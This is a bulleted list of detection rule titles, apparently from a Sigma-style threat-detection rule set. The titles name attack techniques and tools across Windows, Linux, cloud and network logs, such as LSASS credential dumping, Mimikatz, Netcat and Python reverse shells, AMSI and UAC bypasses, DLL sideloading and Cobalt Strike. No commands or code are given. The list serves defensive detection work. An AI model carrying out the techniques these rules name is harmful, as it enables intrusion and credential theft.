  • Execute MSDT.EXE Using Diagcab File
  • MavInject Process Injection
  • Process Memory Dumped Via RdrLeakDiag.EXE
  • Trickbot Malware Reconnaissance Activity
  • Excel Proxy Executing Regsvr32 With Payload
  • Excel Proxy Executing Regsvr32 With Payload Alternate
  • Office Applications Spawning Wmi Cli Alternate
  • PowerShell AMSI Bypass Pattern
  • Base64 Encoded Listing of Shadowcopy
  • Malicious Base64 Encoded Powershell Invoke Cmdlets
  • Suspicious Bitsadmin Job via PowerShell
  • Stop Or Remove Antivirus Service
  • Regsvr32 Anomaly
  • Registry Dump of SAM Creds and Secrets
  • Renamed PsExec
  • Renamed PowerShell
  • Renamed Rundll32.exe Execution
  • Rundll32 JS RunHTMLApplication Pattern
  • Suspicious Add Scheduled Task From User AppData Temp
  • Suspicious Execution of Sc to Delete AV Services
  • Suspicious Characters in CommandLine
  • Run Whoami as SYSTEM
  • Windows Update Client LOLBIN
  • Abusing Windows Telemetry For Persistence - Registry
  • User Account Hidden By Registry
  • Disable Microsoft Office Security Features
  • Adwind RAT / JRAT - Registry
  • Office Security Settings Changed
  • Potential Persistence Via COM Hijacking From Suspicious Locations
  • SilentProcessExit Monitor Registration
  • Accessing WinAPI in PowerShell for Credentials Dumping
  • Mimikatz Detection LSASS Access
  • RClone Execution
  • Windows Defender Threat Detection Disabled
  • Suspicious Esentutl Use
  • Correct Execution of Nltest.exe
  • Rclone Execution via Command Line or PowerShell
  • Activity Related to NTDS.dit Domain Hash Retrieval
  • New Service Uses Double Ampersand in Path
  • SAM Dump to AppData
  • Potential JNDI Injection Exploitation In JVM Based Application
  • Potential Local File Read Vulnerability In JVM Based Application
  • Potential OGNL Injection Exploitation In JVM Based Application
  • Process Execution Error In JVM Based Application
  • Potential XXE Exploitation Attempt In JVM Based Application
  • Potential RCE Exploitation Attempt In NodeJS
  • OpenCanary - FTP Login Attempt
  • OpenCanary - GIT Clone Request
  • OpenCanary - HTTPPROXY Login Attempt
  • OpenCanary - HTTP GET Request
  • OpenCanary - HTTP POST Login Attempt
  • OpenCanary - MSSQL Login Attempt Via SQLAuth
  • OpenCanary - MSSQL Login Attempt Via Windows Authentication
  • OpenCanary - MySQL Login Attempt
  • OpenCanary - NTP Monlist Request
  • OpenCanary - REDIS Action Command Attempt
  • OpenCanary - SIP Request
  • OpenCanary - SMB File Open Request
  • OpenCanary - SNMP OID Request
  • OpenCanary - SSH Login Attempt
  • OpenCanary - SSH New Connection Attempt
  • OpenCanary - Telnet Login Attempt
  • OpenCanary - TFTP Request
  • OpenCanary - VNC Connection Attempt
  • Remote Schedule Task Lateral Movement via ATSvc
  • Remote Schedule Task Recon via AtScv
  • Possible DCSync Attack
  • Remote Event Log Recon
  • Remote Encrypting File System Abuse
  • Remote Schedule Task Lateral Movement via ITaskSchedulerService
  • Remote Schedule Task Recon via ITaskSchedulerService
  • Remote Printing Abuse for Lateral Movement
  • Remote DCOM/WMI Lateral Movement
  • Remote Registry Lateral Movement
  • Remote Registry Recon
  • Remote Server Service Abuse
  • Remote Server Service Abuse for Lateral Movement
  • Remote Schedule Task Lateral Movement via SASec
  • Recon Activity via SASec
  • SharpHound Recon Account Discovery
  • SharpHound Recon Sessions
  • Potential SpEL Injection In Spring Framework
  • Suspicious SQL Error Messages
  • Potential Server Side Template Injection In Velocity
  • Antivirus Hacktool Detection
  • Antivirus Web Shell Detection
  • Antivirus Relevant File Paths Alerts
  • Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure
  • Potential Malicious Usage of CloudTrail System Manager
  • AWS Config Disabling Channel/Recorder
  • AWS EC2 Startup Shell Script Change
  • AWS GuardDuty Important Change
  • AWS IAM S3Browser Templated S3 Bucket Policy Creation
  • AWS IAM S3Browser LoginProfile Creation
  • AWS IAM S3Browser User or AccessKey Creation
  • Modification or Deletion of an AWS RDS Cluster
  • Restore Public AWS RDS Instance
  • AWS SecurityHub Findings Evasion
  • AWS Identity Center Identity Provider Change
  • AWS User Login Profile Was Modified
  • Azure Subscription Permission Elevation Via ActivityLogs
  • Account Created And Deleted Within A Close Time Frame
  • Changes to Device Registration Policy
  • Users Added to Global or Device Admin Roles
  • Application AppID Uri Configuration Changes
  • Added Credentials to Existing Application
  • Delegated Permissions Granted For All Users
  • App Granted Microsoft Permissions
  • App Granted Privileged Delegated Or App Permissions
  • Application URI Configuration Changes
  • Windows LAPS Credential Dump From Entra ID
  • PIM Approvals And Deny Elevation
  • PIM Alert Setting Changes To Disabled
  • Changes To PIM Settings
  • User Added To Privilege Role
  • Bulk Deletion Changes To Privileged Account Permissions
  • Azure Subscription Permission Elevation Via AuditLogs
  • Temporary Access Pass Added To An Account
  • User Risk and MFA Registration Policy Updated
  • Anomalous Token
  • Anomalous User Activity
  • Activity From Anonymous IP Address
  • Anonymous IP Address
  • Atypical Travel
  • Impossible Travel
  • Suspicious Inbox Forwarding Identity Protection
  • Suspicious Inbox Manipulation Rules
  • Azure AD Account Credential Leaked
  • Malicious IP Address Sign-In Failure Rate
  • Malicious IP Address Sign-In Suspicious
  • Sign-In From Malware Infected IP
  • Password Spray Activity
  • Primary Refresh Token Access Attempt
  • Suspicious Browser Activity
  • Azure AD Threat Intelligence
  • SAML Token Issuer Anomaly
  • New Country
  • Unfamiliar Sign-In Properties
  • Stale Accounts In A Privileged Role
  • Invalid PIM License
  • Roles Assigned Outside PIM
  • Roles Activation Doesn't Require MFA
  • Roles Activated Too Frequently
  • Roles Are Not Being Used
  • Too Many Global Admins
  • Discovery Using AzureHound
  • Suspicious SignIns From A Non Registered Device
  • Sign-ins from Non-Compliant Devices
  • Potential MFA Bypass Using Legacy Client Authentication
  • Sign-in Failure Due to Conditional Access Requirements Not Met
  • Use of Legacy Authentication Protocols
  • Bitbucket Full Data Export Triggered
  • Bitbucket Secret Scanning Exempt Repository Added
  • Outdated Dependency Or Vulnerability Alert Disabled
  • Github High Risk Configuration Disabled
  • Github Push Protection Disabled
  • Github Secret Scanning Feature Disabled
  • Azure Login Bypassing Conditional Access Policies
  • Disabling Multi Factor Authentication
  • Okta FastPass Phishing Detection
  • Okta New Admin Console Behaviours
  • Potential Okta Password in AlternateID Field
  • Okta Suspicious Activity Reported by End-user
  • Okta User Session Start Via An Anonymising Proxy Service
  • Auditing Configuration Changes on Linux Host
  • Binary Padding - Linux
  • BPFDoor Abnormal Process ID or Lock File Accessed
  • Disable System Firewall
  • Credentials In Files - Linux
  • Linux Keylogging with Pam.d
  • Modification of ld.so.preload
  • Loading of Kernel Module via Insmod
  • Logging Configuration Changes on Linux Host
  • Equation Group Indicators
  • Buffer Overflow Attempts
  • Commands to Clear or Remove the Syslog - Builtin
  • Code Injection by ld.so Preload
  • Nimbuspwn Exploitation
  • Potential Suspicious BPF Activity - Linux
  • Shellshock Expression
  • Privileged User Has Been Created
  • Linux Command History Tampering
  • Suspicious Activity in Shell Commands
  • Suspicious Reverse Shell Command Line
  • JexBoss Command Sequence
  • Symlink Etc Passwd
  • PwnKit Local Privilege Escalation
  • Relevant ClamAV Message
  • Guacamole Two Users Sharing Session Anomaly
  • Suspicious Named Error
  • Triple Cross eBPF Rootkit Default LockFile
  • Triple Cross eBPF Rootkit Default Persistence
  • Communication To Ngrok Tunneling Service - Linux
  • Communication To LocaltoNet Tunneling Service Initiated - Linux
  • Linux Crypto Mining Pool Connections
  • Potentially Suspicious Malware Callback Communication - Linux
  • Suspicious Invocation of Shell via AWK - Linux
  • Capsh Shell Invocation - Linux
  • Commands to Clear or Remove the Syslog
  • Copy Passwd Or Shadow From TMP Path
  • Linux Crypto Mining Indicators
  • Atlassian Confluence CVE-2022-26134
  • Apache Spark Shell Command Injection - ProcessCreation
  • Shell Invocation via Env Command - Linux
  • ESXi Admin Permission Assigned To Account Via ESXCLI
  • Shell Execution via Find - Linux
  • Shell Execution via Flock - Linux
  • Shell Execution GCC - Linux
  • Shell Execution via Git - Linux
  • Potential GobRAT File Discovery Via Grep
  • Potential Netcat Reverse Shell Execution
  • Shell Execution via Nice - Linux
  • Suspicious Nohup Execution
  • OMIGOD SCX RunAsProvider ExecuteScript
  • OMIGOD SCX RunAsProvider ExecuteShellCommand
  • Potential Perl Reverse Shell Execution
  • Potential PHP Reverse Shell
  • Python Reverse Shell Execution Via PTY And Socket Modules
  • Inline Python Execution - Spawn Shell Via OS System Library
  • Shell Execution via Rsync - Linux
  • Suspicious Invocation of Shell via Rsync
  • Shell Invocation Via Ssh - Linux
  • Sudo Privilege Escalation CVE-2019-14287
  • Potentially Suspicious Execution From Tmp Folder
  • History File Deletion
  • Linux HackTool Execution
  • Suspicious Java Children Processes
  • Linux Recon Indicators
  • Shell Execution Of Process Located In Tmp Directory
  • Triple Cross eBPF Rootkit Execve Hijack
  • Triple Cross eBPF Rootkit Install Commands
  • Vim GTFOBin Abuse - Linux
  • Linux Webshell Indicators
  • Binary Padding - MacOS
  • Clipboard Data Collection Via OSAScript
  • Credentials In Files
  • JXA In-memory Execution Via OSAScript
  • Suspicious Microsoft Office Child Process - MacOS
  • OSACompile Run-Only Execution
  • Potential Persistence Via PlistBuddy
  • Potential Base64 Decoded From Images
  • Potential WizardUpdate Malware Infection
  • Cisco Clear Logs
  • Cisco Crypto Commands
  • Cisco Disabling Logging
  • Cisco Local Accounts
  • DNS Query to External Service Interaction Domains
  • Monero Crypto Coin Mining Pool Lookup
  • DNS TXT Answer with Possible Execution Strings
  • Wannacry Killswitch Domain
  • Default Cobalt Strike Certificate
  • OMIGOD HTTP No Authentication RCE
  • Publicly Accessible RDP Service
  • Possible Impacket SecretDump Remote Activity - Zeek
  • First Time Seen Remote Named Pipe - Zeek
  • Suspicious PsExec Execution - Zeek
  • Apache Segmentation Fault
  • Nginx Core Dump
  • Windows WebDAV User Agent
  • HackTool - CobaltStrike Malleable Profile Patterns - Proxy
  • HackTool - Empire UserAgent URI Combo
  • Raw Paste Service Access
  • Flash Player Update from Suspicious Location
  • APT User Agent
  • Bitsadmin to Uncommon IP Server Address
  • Bitsadmin to Uncommon TLD
  • Crypto Miner User Agent
  • Exploit Framework User Agent
  • Hack Tool User Agent
  • Malware User Agent
  • Suspicious User Agent
  • Suspicious External WebDAV Execution
  • Java Payload Strings
  • JNDIExploit Pattern
  • SQL Injection Strings In URI
  • Server Side Template Injection Strings
  • Suspicious Windows Strings In URI
  • Webshell ReGeorg Detection Via Web Logs
  • Windows Webshell Strings
  • Cross Site Scripting Strings
  • Mimikatz Use
  • Microsoft Malware Protection Engine Crash
  • Potential Credential Dumping Via WER - Application
  • Restricted Software Access By SRP
  • Atera Agent Installation
  • MSSQL Add Account To Sysadmin Role
  • MSSQL Disable Audit Settings
  • MSSQL SPProcoption Set
  • MSSQL XPCmdshell Suspicious Execution
  • MSSQL XPCmdshell Option Change
  • Relevant Anti-Virus Signature Keywords In Application Log
  • Microsoft Malware Protection Engine Crash - WER
  • Suspicious Remote AppX Package Locations
  • Suspicious AppX Package Locations
  • BITS Transfer Job Download From File Sharing Domains
  • BITS Transfer Job Download From Direct IP
  • BITS Transfer Job Download To Potential Suspicious Folder
  • CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked
  • CodeIntegrity - Blocked Image/Driver Load For Policy Violation
  • CodeIntegrity - Blocked Driver Load With Revoked Certificate
  • CodeIntegrity - Revoked Kernel Driver Loaded
  • CodeIntegrity - Blocked Image Load With Revoked Certificate
  • CodeIntegrity - Revoked Image Loaded
  • CodeIntegrity - Unsigned Kernel Module Loaded
  • CodeIntegrity - Unsigned Image Loaded
  • CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module
  • Loading Diagcab Package From Remote Path
  • DNS Query for Anonfiles.com Domain - DNS Client
  • Query Tor Onion Address - DNS Client
  • DNS Server Error Failed Loading the ServerLevelPluginDLL
  • New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application
  • All Rules Have Been Deleted From The Windows Firewall Configuration
  • HTTP Logging Disabled On IIS Server
  • Remove Exported Mailbox from Exchange Webserver
  • Exchange Set OabVirtualDirectory ExternalUrl Property
  • Failed MSExchange Transport Agent Installation
  • Powerview Add-DomainObjectAcl DCSync AD Extend Right
  • AD Privileged Users or Groups Reconnaissance
  • ADCS Certificate Template Configuration Vulnerability with Risky EKU
  • Enabled User Right in AD to Control User Objects
  • Active Directory User Backdoors
  • Weak Encryption Enabled and Kerberoast
  • Hacktool Ruler
  • Security Eventlog Cleared
  • CobaltStrike Service Installations - Security
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Security
  • Mimikatz DC Sync
  • Important Windows Event Auditing Disabled
  • ETW Logging Disabled In .NET Processes - Registry
  • DPAPI Domain Backup Key Extraction
  • Persistence and Execution at Scale via GPO Scheduled Task
  • Hidden Local User Creation
  • HackTool - EDRSilencer Execution - Filter Added
  • HackTool - NoFilter Execution
  • HybridConnectionManager Service Installation
  • Impacket PsExec Execution
  • Possible Impacket SecretDump Remote Activity
  • Invoke-Obfuscation CLIP+ Launcher - Security
  • Invoke-Obfuscation Obfuscated IEX Invocation - Security
  • Invoke-Obfuscation STDIN+ Launcher - Security
  • Invoke-Obfuscation VAR+ Launcher - Security
  • Invoke-Obfuscation Via Stdin - Security
  • Invoke-Obfuscation Via Use Clip - Security
  • Invoke-Obfuscation Via Use MSHTA - Security
  • Invoke-Obfuscation Via Use Rundll32 - Security
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security
  • First Time Seen Remote Named Pipe
  • Credential Dumping Tools Service Execution - Security
  • Metasploit SMB Authentication
  • Metasploit Or Impacket Service Installation Via SMB PsExec
  • Meterpreter or Cobalt Strike Getsystem Service Installation - Security
  • NetNTLM Downgrade Attack
  • Possible PetitPotam Coerce Authentication Attempt
  • PetitPotam Suspicious Kerberos TGT Request
  • PowerShell Scripts Installed as Services - Security
  • Protected Storage Service Access
  • RDP over Reverse SSH Tunnel WFP
  • Register new Logon Process by Rubeus
  • Remote PowerShell Sessions Network Connections (WinRM)
  • Replay Attack Detected
  • SAM Registry Hive Handle Request
  • Service Installed By Unusual Client - Security
  • SMB Create Remote File Admin Share
  • Password Change on Directory Service Restore Mode (DSRM) Account
  • Kerberos Manipulation
  • Suspicious LDAP-Attributes Used
  • Suspicious Windows ANONYMOUS LOGON Local Account Created
  • Password Dumper Activity on LSASS
  • Reconnaissance Activity
  • Password Protected ZIP File Opened (Suspicious Filenames)
  • Password Protected ZIP File Opened (Email Attachment)
  • Possible Shadow Credentials Added
  • Suspicious PsExec Execution
  • Suspicious Scheduled Task Creation
  • Important Scheduled Task Deleted/Disabled
  • Suspicious Scheduled Task Update
  • SysKey Registry Keys Access
  • Sysmon Channel Reference Deletion
  • Suspicious Teams Application Related ObjectAcess Event
  • User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'
  • T1047 Wmiprvse Wbemcomn DLL Hijack
  • RDP Login from Localhost
  • Successful Overpass the Hash Attempt
  • Scanner PoC for CVE-2019-0708 RDP RCE Vuln
  • External Remote SMB Logon from Public IP
  • Potential Privilege Escalation via Local Kerberos Relay over LDAP
  • RottenPotato Like Attack Pattern
  • Windows Filtering Platform Blocked Connection From EDR Agent Binary
  • Microsoft Defender Blocked from Loading Unsigned DLL
  • Unsigned Binary Loaded From Suspicious Location
  • HybridConnectionManager Service Running
  • Sysmon Application Crashed
  • DHCP Server Error Failed Loading the CallOut DLL
  • DHCP Server Loaded the CallOut DLL
  • Local Privilege Escalation Indicator TabTip
  • Important Windows Eventlog Cleared
  • KDC RC4-HMAC Downgrade CVE-2022-37966
  • Critical Hive In Suspicious Location Access Bits Cleared
  • Vulnerable Netlogon Secure Channel Connection Allowed
  • NTFS Vulnerability Exploitation
  • smbexec.py Service Installation
  • Invoke-Obfuscation CLIP+ Launcher - System
  • Invoke-Obfuscation Obfuscated IEX Invocation - System
  • Invoke-Obfuscation STDIN+ Launcher - System
  • Invoke-Obfuscation VAR+ Launcher - System
  • Invoke-Obfuscation Via Stdin - System
  • Invoke-Obfuscation Via Use Clip - System
  • Invoke-Obfuscation Via Use MSHTA - System
  • Invoke-Obfuscation Via Use Rundll32 - System
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System
  • KrbRelayUp Service Installation
  • Credential Dumping Tools Service Execution - System
  • Meterpreter or Cobalt Strike Getsystem Service Installation - System
  • PowerShell Scripts Installed as Services
  • HackTool Service Registration or Execution
  • ProcessHacker Privilege Elevation
  • Sliver C2 Default Service Installation
  • Service Installed By Unusual Client - System
  • Suspicious Service Installation
  • Important Windows Service Terminated With Error
  • Important Windows Service Terminated Unexpectedly
  • RTCore Suspicious Service Installation
  • Service Installation with Suspicious Folder Pattern
  • Suspicious Service Installation Script
  • Important Scheduled Task Deleted
  • Ngrok Usage with Remote Desktop Service
  • Windows Defender Grace Period Expired
  • LSASS Access Detected via Attack Surface Reduction
  • PSExec and WMI Process Creations Block
  • Windows Defender Exploit Guard Tamper
  • Windows Defender Malware And PUA Scanning Disabled
  • Windows Defender AMSI Trigger Detected
  • Windows Defender Real-time Protection Disabled
  • Win Defender Restored Quarantine File
  • Windows Defender Configuration Changes
  • Microsoft Defender Tamper Protection Trigger
  • Windows Defender Threat Detected
  • Windows Defender Virus Scanning Feature Disabled
  • HackTool - CACTUSTORCH Remote Thread Creation
  • HackTool - Potential CobaltStrike Process Injection
  • Remote Thread Created In KeePass.EXE
  • Remote Thread Creation In Mstsc.Exe From Suspicious Location
  • Potential Credential Dumping Attempt Via PowerShell Remote Thread
  • Password Dumper Remote Thread in LSASS
  • Rare Remote Thread Creation By Uncommon Source Image
  • Remote Thread Creation Ttdinject.exe Proxy
  • Suspicious File Download From File Sharing Websites - File Stream
  • HackTool Named File Stream Created
  • Exports Registry Key To an Alternate Data Stream
  • Unusual File Download from Direct IP Address
  • Potential Suspicious Winget Package Installation
  • Potentially Suspicious File Download From ZIP TLD
  • DNS Query for Anonfiles.com Domain - Sysmon
  • DNS HybridConnectionManager Service Bus
  • DNS Query Tor .Onion Address - Sysmon
  • Malicious Driver Load
  • Driver Load From A Temporary Directory
  • PUA - Process Hacker Driver Load
  • Vulnerable HackSys Extreme Vulnerable Driver Load
  • Vulnerable WinRing0 Driver Load
  • WinDivert Driver Load
  • Vulnerable Driver Load
  • File Creation Date Changed to Another Year
  • Unusual File Modification by dns.exe
  • Potential PrintNightmare Exploitation Attempt
  • Exchange PowerShell Cmdlet History Deleted
  • Prefetch File Deleted
  • Unusual File Deletion by Dns.exe
  • Suspicious Binary Writes Via AnyDesk
  • BloodHound Collection Files
  • Creation Exe for Service with Unquoted Path
  • Cred Dump Tools Dropped Files
  • WScript or CScript Dropper - File
  • DLL Search Order Hijackig Via Additional Space in Path
  • Suspicious ASPX File Drop by Exchange
  • HackTool - CrackMapExec File Indicators
  • HackTool - Typical HiveNightmare SAM File Export
  • HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators
  • HackTool - NPPSpy Hacktool Usage
  • HackTool - Powerup Write Hijack DLL
  • HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
  • HackTool - SafetyKatz Dump Indicator
  • Malicious DLL File Dropped in the Teams or OneDrive Folder
  • ISO File Created Within Temp Folders
  • LSASS Process Memory Dump Files
  • LSASS Process Dump Artefact In CrashDumps Folder
  • WerFault LSASS Process Memory Dump
  • Octopus Scanner Malware
  • Adwind RAT / JRAT File Artifact
  • File Creation In Suspicious Directory By Msdt.EXE
  • Uncommon File Creation By Mysql Daemon Process
  • Suspicious DotNET CLR Usage Log Artifact
  • Suspicious File Creation In Uncommon AppData Folder
  • NTDS.DIT Creation By Uncommon Parent Process
  • NTDS.DIT Creation By Uncommon Process
  • NTDS Exfiltration Filename Patterns
  • Potential Persistence Via Microsoft Office Add-In
  • Office Macro File Creation From Suspicious Process
  • Suspicious File Created Via OneNote Application
  • .RDP File Created by Outlook Process
  • PCRE.NET Package Temp Files
  • Suspicious Outlook Macro Created
  • Potential Persistence Via Microsoft Office Startup Folder
  • File With Uncommon Extension Created By An Office Application
  • Uncommon File Created In Office Startup Folder
  • Potential Persistence Via Outlook Form
  • Malicious PowerShell Scripts - FileCreation
  • Potential Startup Shortcut Persistence Via PowerShell.EXE
  • .RDP File Created By Uncommon Application
  • Potential Winnti Dropper Activity
  • PDF File Created By RegEdit.EXE
  • Potential RipZip Attack on Startup Folder
  • Potential SAM Database Dump
  • Windows Shell/Scripting Application File Write to Suspicious Folder
  • Windows Binaries Write Suspicious Extensions
  • Suspicious Creation with Colorcpl
  • Suspicious Desktopimgdownldr Target File
  • Suspicious Creation TXT File in User Desktop
  • DPAPI Backup Keys And Certificate Export Activity IOC
  • Suspicious Double Extension Files
  • Suspicious MSExchangeMailboxReplication ASPX Write
  • Suspicious Executable File Creation
  • Suspicious Get-Variable.exe Creation
  • Legitimate Application Dropped Archive
  • Legitimate Application Dropped Executable
  • Legitimate Application Dropped Script
  • Suspicious File Creation Activity From Fake Recycle.Bin Folder
  • Potential File Extension Spoofing Using Right-to-Left Override
  • Suspicious Startup Folder Persistence
  • Suspicious Scheduled Task Write to System32 Tasks
  • Suspicious Interactive PowerShell as SYSTEM
  • LiveKD Kernel Memory Dump File Created
  • LiveKD Driver Creation By Uncommon Process
  • Process Explorer Driver Creation By Non-Sysinternals Binary
  • PSEXEC Remote Execution File Artefact
  • Potential Privilege Escalation Attempt Via .Exe.Local Technique
  • LSASS Process Memory Dump Creation Via Taskmgr.EXE
  • Hijack Legit RDP Session to Move Laterally
  • UAC Bypass Using Consent and Comctl32 - File
  • UAC Bypass Using .NET Code Profiler on MMC
  • UAC Bypass Using EventVwr
  • UAC Bypass Using IDiagnostic Profile - File
  • UAC Bypass Using IEInstal - File
  • UAC Bypass Using MSConfig Token Modification - File
  • UAC Bypass Using NTFS Reparse Point - File
  • UAC Bypass Abusing Winsat Path Parsing - File
  • UAC Bypass Using Windows Media Player - File
  • Renamed VsCode Code Tunnel Execution - File Indicator
  • WMI Persistence - Script Event Consumer File Write
  • UEFI Persistence Via Wpbbin - FileCreation
  • DLL Loaded From Suspicious Location Via Cmspt.EXE
  • Suspicious Renamed Comsvcs DLL Loaded By Rundll32
  • Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded
  • PCRE.NET Package Image Load
  • Load Of RstrtMgr.DLL By A Suspicious Process
  • Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE
  • Time Travel Debugging Utility Usage - Image
  • Suspicious Volume Shadow Copy Vssapi.dll Load
  • Suspicious Volume Shadow Copy VSS_PS.dll Load
  • HackTool - SILENTTRINITY Stager DLL Load
  • HackTool - SharpEvtMute DLL Load
  • GAC DLL Loaded Via Office Applications
  • VBA DLL Loaded Via Office Application
  • Abusable DLL Potential Sideloading From Suspicious Location
  • Potential appverifUI.DLL Sideloading
  • Aruba Network Service Potential DLL Sideloading
  • Potential DLL Sideloading Via comctl32.dll
  • Potential EACore.DLL Sideloading
  • Potential Edputil.DLL Sideloading
  • Potential System DLL Sideloading From Non System Locations
  • Potential Iviewers.DLL Sideloading
  • Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE
  • Unsigned Mfdetours.DLL Sideloading
  • Potential DLL Sideloading Of Non-Existent DLLs From System Folders
  • Microsoft Office DLL Sideload
  • Potential Rcdll.DLL Sideloading
  • Potential RjvPlatform.DLL Sideloading From Non-Default Location
  • DLL Sideloading Of ShellChromeAPI.DLL
  • Potential SmadHook.DLL Sideloading
  • Fax Service DLL Search Order Hijack
  • VMMap Unsigned Dbghelp.DLL Potential Sideloading
  • Potential DLL Sideloading Via VMware Xfer
  • Potential Waveedit.DLL Sideloading
  • Potential Mpclient.DLL Sideloading
  • DotNet CLR DLL Loaded By Scripting Applications
  • Suspicious Unsigned Thor Scanner Execution
  • UAC Bypass Using Iscsicpl - ImageLoad
  • UAC Bypass With Fake DLL
  • Wmiprvse Wbemcomn DLL Hijack
  • WMI Persistence - Command Line Event Consumer
  • Network Connection Initiated By AddinUtil.EXE
  • Uncommon Network Connection Initiated By Certutil.EXE
  • Outbound Network Connection Initiated By Cmstp.EXE
  • Outbound Network Connection Initiated By Microsoft Dialer
  • Network Communication With Crypto Mining Pool
  • New Connection Initiated To Potential Dead Drop Resolver Domain
  • Suspicious Dropbox API Usage
  • Communication To LocaltoNet Tunneling Service Initiated
  • Process Initiated Network Connection To Ngrok Domain
  • Communication To Ngrok Tunneling Service Initiated
  • Network Connection Initiated By Eqnedt32.EXE
  • Network Connection Initiated By IMEWDBLD.EXE
  • Network Connection Initiated Via Notepad.EXE
  • Outbound RDP Connections Over Non-Standard Tools
  • RDP Over Reverse SSH Tunnel
  • RDP to HTTP or HTTPS Target Ports
  • Silenttrinity Stager Msbuild Activity
  • Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location
  • Potentially Suspicious Malware Callback Communication
  • Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder
  • Potential Remote PowerShell Session Initiated
  • Suspicious Network Connection Binary No CommandLine
  • Outbound Network Connection Initiated By Script Interpreter
  • CobaltStrike Named Pipe Patterns
  • HackTool - CoercedPotato Named Pipe Creation
  • HackTool - EfsPotato Named Pipe Creation
  • Delete Volume Shadow Copies Via WMI With PowerShell
  • PowerShell Called from an Executable Version Mismatch
  • Potential RemoteFXvGPUDisablement.EXE Abuse
  • Tamper Windows Defender - PSClassic
  • Malicious PowerShell Scripts - PoshModule
  • Suspicious Get-ADDBAccount Usage
  • HackTool - Evil-WinRm Execution - PowerShell Module
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell Module
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module
  • Invoke-Obfuscation STDIN+ Launcher - PowerShell Module
  • Invoke-Obfuscation VAR+ Launcher - PowerShell Module
  • Invoke-Obfuscation Via Stdin - PowerShell Module
  • Invoke-Obfuscation Via Use MSHTA - PowerShell Module
  • Invoke-Obfuscation Via Use Clip - PowerShell Module
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell Module
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module
  • Malicious PowerShell Commandlets - PoshModule
  • Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module
  • Remote PowerShell Session (PS Module)
  • Suspicious PowerShell Invocations - Generic - PowerShell Module
  • Suspicious PowerShell Invocations - Specific - PowerShell Module
  • AADInternals PowerShell Cmdlets Execution - PsScript
  • Powershell Add Name Resolution Policy Table Rule
  • PowerShell ADRecon Execution
  • AMSI Bypass Pattern Assembly GetType
  • Clearing Windows Console History
  • Powershell Install a DLL in System Directory
  • Create Volume Shadow Copy with Powershell
  • Disable Powershell Command History
  • Disable-WindowsOptionalFeature Command PowerShell
  • DSInternals Suspicious PowerShell Cmdlets - ScriptBlock
  • Disable of ETW Trace - Powershell
  • HackTool - Rubeus Execution - ScriptBlock
  • HackTool - WinPwn Execution - ScriptBlock
  • Powershell DNSExfiltration
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell
  • Invoke-Obfuscation STDIN+ Launcher - Powershell
  • Invoke-Obfuscation VAR+ Launcher - PowerShell
  • Invoke-Obfuscation Via Stdin - Powershell
  • Invoke-Obfuscation Via Use Clip - Powershell
  • Invoke-Obfuscation Via Use MSHTA - PowerShell
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell
  • Malicious PowerShell Commandlets - ScriptBlock
  • Live Memory Dump Using Powershell
  • Malicious Nishang PowerShell Commandlets
  • NTFS Alternate Data Stream
  • Code Executed Via Office Add-in XLL File
  • Potential Invoke-Mimikatz PowerShell Script
  • PowerShell Web Access Installation - PsScript
  • PowerView PowerShell Cmdlets - ScriptBlock
  • PowerShell Credential Prompt
  • PSAsyncShell - Asynchronous TCP Reverse Shell
  • PowerShell PSAttack
  • Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock
  • Request A Single Ticket via PowerShell
  • PowerShell Set-Acl On Windows Folder - PsScript
  • PowerShell ShellCode
  • Malicious ShellIntel PowerShell Commandlets
  • Potential Persistence Via Security Descriptors - ScriptBlock
  • PowerShell Get-Process LSASS in ScriptBlock
  • Suspicious PowerShell Invocations - Generic
  • Suspicious PowerShell Invocations - Specific
  • Suspicious Service DACL Modification Via Set-Service Cmdlet - PS
  • Delete Volume Shadow Copies via WMI with PowerShell - PS Script
  • Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script
  • Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging
  • Tamper Windows Defender - ScriptBlockLogging
  • Powershell Token Obfuscation - Powershell
  • Abuse of Service Permissions to Hide Services Via Set-Service - PS
  • Veeam Backup Servers Credential Dumping Script Execution
  • Potential WinAPI Calls Via PowerShell Scripts
  • WMImplant Hack Tool
  • CMSTP Execution Process Access
  • HackTool - CobaltStrike BOF Injection Pattern
  • HackTool - Generic Process Access
  • HackTool - LittleCorporal Generated Maldoc Injection
  • HackTool - HandleKatz Duplicating LSASS Handle
  • Lsass Memory Dump via Comsvcs DLL
  • HackTool - SysmonEnte Execution
  • LSASS Memory Access by Tool With Dump Keyword In Name
  • Credential Dumping Activity By Python Based Tool
  • Remote LSASS Process Access Through Windows Remote Management
  • Suspicious LSASS Access Via MalSecLogon
  • Credential Dumping Attempt Via WerFault
  • LSASS Access From Potentially White-Listed Processes
  • Credential Dumping Attempt Via Svchost
  • Suspicious Svchost Process Access
  • UAC Bypass Using WOW64 Logger DLL Hijack
  • Suspicious AddinUtil.EXE CommandLine Execution
  • Potential Adplus.EXE Abuse
  • Suspicious AgentExecutor PowerShell Execution
  • Suspicious Child Process of AspNetCompiler
  • Potentially Suspicious ASP.NET Compilation Via AspNetCompiler
